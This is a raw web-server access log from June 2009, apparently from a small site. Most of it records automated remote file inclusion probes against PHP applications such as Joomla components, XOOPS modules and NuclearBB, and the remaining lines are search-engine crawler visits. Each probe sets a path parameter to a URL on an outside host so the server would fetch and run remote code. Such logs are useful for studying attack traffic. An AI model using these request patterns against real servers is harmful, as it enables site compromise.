222.122.79.200 - - [27/Jun/2009:01:15:05 -0500] "GET /logs/access_log.1239148800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:18:25 -0500] "GET //modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:18:25 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:18:25 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.55.106.123 - - [27/Jun/2009:01:19:25 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.188 - - [27/Jun/2009:01:20:28 -0500] "GET //modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:20:28 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:20:28 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:21:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:21:06 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [27/Jun/2009:01:21:06 -0500] "GET //modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.106.245.84 - - [27/Jun/2009:01:28:24 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
87.106.245.84 - - [27/Jun/2009:01:28:24 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.110.88.229 - - [27/Jun/2009:01:28:27 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.110.88.229 - - [27/Jun/2009:01:28:28 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/test.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
65.55.208.123 - - [27/Jun/2009:01:32:03 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.68.42 - - [27/Jun/2009:01:33:23 -0500] "GET /_vti_cnf/?N=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.207 - - [27/Jun/2009:01:33:25 -0500] "GET /logs/access_log.1186358400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [27/Jun/2009:01:35:03 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [27/Jun/2009:01:35:03 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
121.165.73.157 - - [27/Jun/2009:01:36:19 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:01:36:19 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:01:36:19 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:01:36:52 -0500] "GET /logs/access_log.1240963200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:01:36:52 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:01:36:52 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
81.169.149.193 - - [27/Jun/2009:01:42:30 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
81.169.149.193 - - [27/Jun/2009:01:42:30 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
81.169.149.193 - - [27/Jun/2009:01:42:30 -0500] "GET /logs/access_log.1240963200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
65.55.106.230 - - [27/Jun/2009:01:44:24 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.198.32.3 - - [27/Jun/2009:01:44:33 -0500] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:01:44:33 -0500] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.206.120.187 - - [27/Jun/2009:01:53:54 -0500] "GET //citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:01:53:54 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:01:53:55 -0500] "GET /logs//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:01:53:55 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:01:55:11 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:13 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:19 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:22 -0500] "GET /errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:22 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:22 -0500] "GET /logs/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:57:26 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:36 -0500] "GET /errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:36 -0500] "GET /logs/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:37 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:44 -0500] "GET /logs/access_log.1239062400/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:57:57 -0500] "GET /logs/access_log.1239062400/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:58:10 -0500] "GET /errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:58:11 -0500] "GET /logs/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:58:12 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:01:58:31 -0500] "GET /logs/access_log.1239062400/errors.php?error=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:02:00:33 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:02:00:33 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:02:00:33 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
131.203.76.246 - - [27/Jun/2009:02:00:43 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:23 -0500] "GET /logs/access_log.1240444800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:34 -0500] "GET /logs/access_log.1242000000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:02:01:36 -0500] "GET /errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:02:01:36 -0500] "GET /logs/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:02:01:37 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:37 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:37 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:38 -0500] "GET /logs/access_log.1242000000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:01:38 -0500] "GET /logs/access_log.1240444800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [27/Jun/2009:02:02:06 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:02:02:11 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:02:02:12 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:02:02:13 -0500] "GET /logs/access_log.1233187200/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:02:57 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:02:57 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:02:58 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:03:07 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:03:08 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:03:08 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:04:44 -0500] "GET /logs/access_log.1238198400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:02:05:00 -0500] "GET /logs/access_log.1238198400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
220.181.7.97 - - [27/Jun/2009:02:10:44 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.75.60.116 - - [27/Jun/2009:02:11:48 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:11:48 -0500] "GET /?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:11:48 -0500] "GET /?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:11:48 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:11:49 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:11:50 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:12:32 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:12:32 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.125.64.38 - - [27/Jun/2009:02:12:59 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.94.80.27 - - [27/Jun/2009:02:15:26 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:15:26 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:15:27 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:16:04 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:16:04 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.94.80.27 - - [27/Jun/2009:02:16:04 -0500] "GET /logs/access_log.1240358400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.68.42 - - [27/Jun/2009:02:18:05 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 200 358870 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.131.116.12 - - [27/Jun/2009:02:28:31 -0500] "GET /logs/access_log.1236211200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:02:28:31 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:02:28:33 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:02:28:41 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:29:26 -0500] "GET /include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:29:26 -0500] "GET /logs/access_log.1233705600/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:29:26 -0500] "GET /logs/access_log.1237680000/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:29:26 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:02:34:23 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:02:34:23 -0500] "GET /?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:02:34:23 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:02:34:25 -0500] "GET /logs/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:02:38:46 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:02:38:56 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:43:37 -0500] "GET /include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:43:37 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:43:37 -0500] "GET /logs/access_log.1237680000/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:02:43:37 -0500] "GET /logs/access_log.1233705600/include/mail.inc.php?skin_board_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:02:48:00 -0500] "GET ///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:02:48:01 -0500] "GET /logs/access_log.1228608000///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:02:48:02 -0500] "GET /logs///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 194918 "-""libwww-perl/5.79"
94.23.195.160 - - [27/Jun/2009:02:52:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.826"
94.23.195.160 - - [27/Jun/2009:02:52:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
94.23.195.160 - - [27/Jun/2009:02:54:19 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.826"
94.23.195.160 - - [27/Jun/2009:02:54:19 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.826"
67.202.81.179 - - [27/Jun/2009:02:54:52 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:54:52 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:54:52 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:54:52 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET /logs/access_log.1237680000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
